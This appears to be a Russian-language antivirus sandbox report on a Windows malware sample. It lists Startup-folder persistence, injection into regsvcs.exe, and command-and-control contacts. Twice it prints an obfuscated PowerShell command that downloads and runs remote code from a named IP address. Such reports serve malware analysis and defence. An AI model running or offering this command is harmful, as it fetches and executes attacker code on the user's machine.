Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\c.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrinG'('ht'+'tp://8.129.118.161/wp-admin/css/d')
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe
следующие пользовательские процессы:
- c.exe
Сетевая активность
Подключается к
- '8.###.118.161':80
- 'ip##pi.com':80
- 'sy#####r.publicvm.com':4782
TCP
Запросы HTTP GET
- http://8.###.118.161/wp-admin/css/d
- http://8.###.118.161/wp-admin/css/c
- http://ip##pi.com/json/
Другие
- 'sy#####r.publicvm.com':4782
UDP
- DNS ASK ip##pi.com
- DNS ASK sy#####r.publicvm.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\microsoft\windows\start menu\programs\startup\c.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrinG'('ht'+'tp://8.129.118.161/wp-admin/css/d')' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regsvcs.exe'
